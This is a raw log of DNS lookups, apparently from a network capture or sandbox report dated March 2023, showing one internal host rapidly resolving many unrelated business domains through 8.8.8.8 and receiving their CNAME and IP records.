                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.476238012 CET8.8.8.8192.168.2.60x4b9aNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.476464033 CET8.8.8.8192.168.2.60x7356No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.572211981 CET8.8.8.8192.168.2.60xe9f1No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.611603975 CET8.8.8.8192.168.2.60xda20No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.623872995 CET8.8.8.8192.168.2.60x965aNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.623872995 CET8.8.8.8192.168.2.60x965aNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.728503942 CET8.8.8.8192.168.2.60x5da2Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.857405901 CET8.8.8.8192.168.2.60x5c95No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.857405901 CET8.8.8.8192.168.2.60x5c95No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.228096008 CET8.8.8.8192.168.2.60x20d6No error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.228096008 CET8.8.8.8192.168.2.60x20d6No error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.234249115 CET8.8.8.8192.168.2.60x50a1No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.234249115 CET8.8.8.8192.168.2.60x50a1No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.565469027 CET8.8.8.8192.168.2.60x95dNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.565469027 CET8.8.8.8192.168.2.60x95dNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.579984903 CET8.8.8.8192.168.2.60xb5abNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.579984903 CET8.8.8.8192.168.2.60xb5abNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.597028017 CET8.8.8.8192.168.2.60x9d6dNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.656138897 CET8.8.8.8192.168.2.60xb849No error (0)www.cokocoko.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.656138897 CET8.8.8.8192.168.2.60xb849No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.656138897 CET8.8.8.8192.168.2.60xb849No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.656138897 CET8.8.8.8192.168.2.60xb849No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.172616005 CET8.8.8.8192.168.2.60x59No error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.172616005 CET8.8.8.8192.168.2.60x59No error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.179335117 CET8.8.8.8192.168.2.60xa7c4No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.179335117 CET8.8.8.8192.168.2.60xa7c4No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.609590054 CET8.8.8.8192.168.2.60xe8bbNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.609590054 CET8.8.8.8192.168.2.60xe8bbNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.612377882 CET8.8.8.8192.168.2.60x5fa0Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.625813007 CET8.8.8.8192.168.2.60xacc2No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.625813007 CET8.8.8.8192.168.2.60xacc2No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.706306934 CET8.8.8.8192.168.2.60xa89bNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.894494057 CET8.8.8.8192.168.2.60x74aeNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.911345959 CET8.8.8.8192.168.2.60x5ab6No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.911345959 CET8.8.8.8192.168.2.60x5ab6No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.008771896 CET8.8.8.8192.168.2.60x26cNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.008771896 CET8.8.8.8192.168.2.60x26cNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.142899036 CET8.8.8.8192.168.2.60x27acNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.607013941 CET8.8.8.8192.168.2.60xfd36No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.607013941 CET8.8.8.8192.168.2.60xfd36No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.864399910 CET8.8.8.8192.168.2.60x1821No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.951694965 CET8.8.8.8192.168.2.60xbc22No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.997818947 CET8.8.8.8192.168.2.60xf227No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.997818947 CET8.8.8.8192.168.2.60xf227No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.185630083 CET8.8.8.8192.168.2.60x9a23No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.239236116 CET8.8.8.8192.168.2.60x6c75No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.259965897 CET8.8.8.8192.168.2.60x1aaaNo error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.259965897 CET8.8.8.8192.168.2.60x1aaaNo error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.269964933 CET8.8.8.8192.168.2.60xcf8fNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:23.171919107 CET8.8.8.8192.168.2.60x8438No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:23.767040968 CET8.8.8.8192.168.2.60x8438No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.055485010 CET8.8.8.8192.168.2.60xc55bNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.148502111 CET8.8.8.8192.168.2.60x2870No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.163430929 CET8.8.8.8192.168.2.60x600No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.176508904 CET8.8.8.8192.168.2.60x7cbbName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.194852114 CET8.8.8.8192.168.2.60x7800No error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.194852114 CET8.8.8.8192.168.2.60x7800No error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.194886923 CET8.8.8.8192.168.2.60x422aNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.255197048 CET8.8.8.8192.168.2.60x65ecNo error (0)www.netcr.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.255197048 CET8.8.8.8192.168.2.60x65ecNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.255197048 CET8.8.8.8192.168.2.60x65ecNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.255197048 CET8.8.8.8192.168.2.60x65ecNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.311194897 CET8.8.8.8192.168.2.60xa85No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.311194897 CET8.8.8.8192.168.2.60xa85No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.606112957 CET8.8.8.8192.168.2.60x7a81No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.606112957 CET8.8.8.8192.168.2.60x7a81No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.606112957 CET8.8.8.8192.168.2.60x7a81No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.635323048 CET8.8.8.8192.168.2.60x7e33No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.635323048 CET8.8.8.8192.168.2.60x7e33No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.656008005 CET8.8.8.8192.168.2.60x40b6No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.803199053 CET8.8.8.8192.168.2.60x7d66No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.686427116 CET8.8.8.8192.168.2.60x9a9aNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.696830988 CET8.8.8.8192.168.2.60x3ff2No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.698640108 CET8.8.8.8192.168.2.60x653aNo error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.777107000 CET8.8.8.8192.168.2.60x9eeaNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.777107000 CET8.8.8.8192.168.2.60x9eeaNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.814984083 CET8.8.8.8192.168.2.60x8030No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981386900 CET8.8.8.8192.168.2.60x40faNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981386900 CET8.8.8.8192.168.2.60x40faNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981386900 CET8.8.8.8192.168.2.60x40faNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981386900 CET8.8.8.8192.168.2.60x40faNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981386900 CET8.8.8.8192.168.2.60x40faNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.702439070 CET8.8.8.8192.168.2.60x75d4Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.962389946 CET8.8.8.8192.168.2.60xd836No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.966981888 CET8.8.8.8192.168.2.60x101eName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.131993055 CET8.8.8.8192.168.2.60xd7b0No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.141623020 CET8.8.8.8192.168.2.60x4f20No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:32.701700926 CET8.8.8.8192.168.2.60x43ddNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:33.185854912 CET8.8.8.8192.168.2.60x52b9No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.666435003 CET8.8.8.8192.168.2.60xb019No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.666435003 CET8.8.8.8192.168.2.60xb019No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.686929941 CET8.8.8.8192.168.2.60xbbc9No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.713191032 CET8.8.8.8192.168.2.60xe7efNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.713191032 CET8.8.8.8192.168.2.60xe7efNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.746551991 CET8.8.8.8192.168.2.60x2693No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.746551991 CET8.8.8.8192.168.2.60x2693No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.746668100 CET8.8.8.8192.168.2.60xd702No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.746668100 CET8.8.8.8192.168.2.60xd702No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.754143953 CET8.8.8.8192.168.2.60xd41eName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.758770943 CET8.8.8.8192.168.2.60x366Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.829361916 CET8.8.8.8192.168.2.60x1fc4No error (0)www.pdqhomes.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.829361916 CET8.8.8.8192.168.2.60x1fc4No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.829361916 CET8.8.8.8192.168.2.60x1fc4No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.829361916 CET8.8.8.8192.168.2.60x1fc4No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.906739950 CET8.8.8.8192.168.2.60x67f0No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.906739950 CET8.8.8.8192.168.2.60x67f0No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.941848040 CET8.8.8.8192.168.2.60xfd4fNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.259669065 CET8.8.8.8192.168.2.60xf959No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.259669065 CET8.8.8.8192.168.2.60xf959No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.259669065 CET8.8.8.8192.168.2.60xf959No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.308572054 CET8.8.8.8192.168.2.60x203eNo error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.308572054 CET8.8.8.8192.168.2.60x203eNo error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.309503078 CET8.8.8.8192.168.2.60x7bd1No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.309503078 CET8.8.8.8192.168.2.60x7bd1No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.309503078 CET8.8.8.8192.168.2.60x7bd1No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.412257910 CET8.8.8.8192.168.2.60xf416No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.412257910 CET8.8.8.8192.168.2.60xf416No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.412257910 CET8.8.8.8192.168.2.60xf416No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.461509943 CET8.8.8.8192.168.2.60x56afNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.461509943 CET8.8.8.8192.168.2.60x56afNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.461509943 CET8.8.8.8192.168.2.60x56afNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.723586082 CET8.8.8.8192.168.2.60xa623No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.723586082 CET8.8.8.8192.168.2.60xa623No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.723586082 CET8.8.8.8192.168.2.60xa623No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.723586082 CET8.8.8.8192.168.2.60xa623No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.723586082 CET8.8.8.8192.168.2.60xa623No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.737943888 CET8.8.8.8192.168.2.60x534fNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.737943888 CET8.8.8.8192.168.2.60x534fNo error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.360301018 CET8.8.8.8192.168.2.60xefc2No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.496021986 CET8.8.8.8192.168.2.60x754No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.543030024 CET8.8.8.8192.168.2.60x867bName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.545048952 CET8.8.8.8192.168.2.60xaa73No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.545048952 CET8.8.8.8192.168.2.60xaa73No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.545048952 CET8.8.8.8192.168.2.60xaa73No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.554559946 CET8.8.8.8192.168.2.60xf7e8No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.554559946 CET8.8.8.8192.168.2.60xf7e8No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.556855917 CET8.8.8.8192.168.2.60xf6d2No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.556855917 CET8.8.8.8192.168.2.60xf6d2No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.558358908 CET8.8.8.8192.168.2.60xb814No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.558358908 CET8.8.8.8192.168.2.60xb814No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.558358908 CET8.8.8.8192.168.2.60xb814No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.558358908 CET8.8.8.8192.168.2.60xb814No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.576278925 CET8.8.8.8192.168.2.60x2078No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.583590984 CET8.8.8.8192.168.2.60xb3c3No error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.288358927 CET8.8.8.8192.168.2.60x16c7No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.288358927 CET8.8.8.8192.168.2.60x16c7No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
